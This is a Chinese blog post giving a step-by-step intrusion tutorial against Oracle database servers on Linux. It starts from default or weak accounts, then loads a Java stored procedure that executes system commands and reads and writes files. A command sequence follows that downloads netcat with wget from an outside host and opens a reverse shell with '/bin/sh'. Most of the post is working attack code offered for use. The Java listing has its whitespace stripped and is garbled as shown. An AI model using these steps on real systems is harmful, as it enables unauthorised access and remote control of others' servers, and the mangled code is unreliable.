很多時候對於開放1521埠的Windows下Oracle資料庫伺服器，因為大多存在預設低許可權使用者dbsnmp，或者人品爆發高許可權的使用者 (sysdba)是預設密碼或弱口令，由此可以通過Oracle的一些提權漏洞獲取Oracle的最高許可權，直至得到系統的SYSTEM許可權。

而 對於Linux下的Oracle資料庫入侵，因為Linux下一般Oracle資料庫都是以Oracle的獨立使用者在跑，所以無法獲取到root許可權。當 然很多WEB和資料庫在同一伺服器上的時候，可以匯出WEBSHELL到WEB目錄來獲取許可權。然而大部分的資料庫都是獨立跑在一個伺服器上，以下用簡單 的方式獲取Oracle的shell，即採用nc反彈的shell的方式。

1、Oracle資料庫支援JAVA（如Windows下入侵一般）

2、通過Oracle客戶端sqlplus，以sysdba使用者登入（dbsnmp使用者可提權至sysdba）

3、執行以下程式碼：
CODE_1:

1. createorreplaceandresolvejavasourcenamed"oraexec"as
2. importjava.lang.*;
3. importjava.io.*;
4. publicclassoraexec
5. {
6. /*
7. *Commandexecutionmodule
8. */
9. publicstaticvoidexecCommand(Stringcommand)throwsIOException
10. {
11. Runtime.getRuntime().exec(command);
12. }
14. /*
15. *Filereadingmodule
16. */
17. publicstaticvoidreadFile(Stringfilename)throwsIOException
18. {
19. FileReaderf=newFileReader(filename);
20. BufferedReaderfr=newBufferedReader(f);
21. Stringtext=fr.readLine();
22. while(text!=null){
23. System.out.println(text);
24. text
    =fr.readLine();
25. }
26. fr.close();
27. }
29. /*
30. *Filewritingmodule
31. */
32. publicstaticvoidwriteFile(Stringfilename,Stringline)throwsIOException
33. {
34. FileWriterf=newFileWriter(filename,true);/*append*/
35. BufferedWriterfw=newBufferedWriter(f);
36. fw.write(line);
37. fw.write("\n");
38. fw.close();
39. }
40. }

============================================

CODE_2:

-- usage: exec javacmd('command');create or replace procedure javacmd(p_command varchar2) aslanguage javaname 'oraexec.execCommand(java.lang.String)';

===========================================

CODE_3:

-- usage: exec dbms_java.set_output(2000);-- set serveroutput on;-- exec javareadfile('/path/to/file');create or replace procedure javareadfile(p_filename in varchar2) aslanguage javaname 'oraexec.readFile(java.lang.String)';

============================================

CODE_4:

-- usage: exec javawritefile('/path/to/file', 'line to append');create or replace procedure javawritefile(p_filename in varchar2, p_line in varchar2) aslanguage javaname 'oraexec.writeFile(java.lang.String, java.lang.String)';

4、

exec javawritefile('/tmp/getnc', 'wget http://www/nc -O /tmp/nc'); //寫入wget nc 命令到檔案getnc

exec dbms_java.set_output(2000); //設定javareadfile

set serveroutput on;

exec javareadfile('/tmp/getnc'); //讀取檔案檢視是否寫入成功

exec javacmd('/bin/sh /tmp/getnc'); //執行命令下載nc

exec javareadfile('/tmp/nc'); //檢視nc是否下載成功

exec javawritefile('/tmp/shell', '/tmp/ncIPport -e /bin/sh'); //寫入反彈命令

exec javareadfile('/tmp/shell'); //讀取檔案檢視是否寫入成功

exec javacmd('/bin/sh /tmp/shell'); //執行nc反彈shell，在本地nc監聽就能得到shell，如果不行，請確認防火牆

---------------------
作者：小寶哥哥
來源：CNBLOGS
原文：https://www.cnblogs.com/baogg/articles/1991108.html
版權宣告：本文為作者原創文章，轉載請附上博文連結！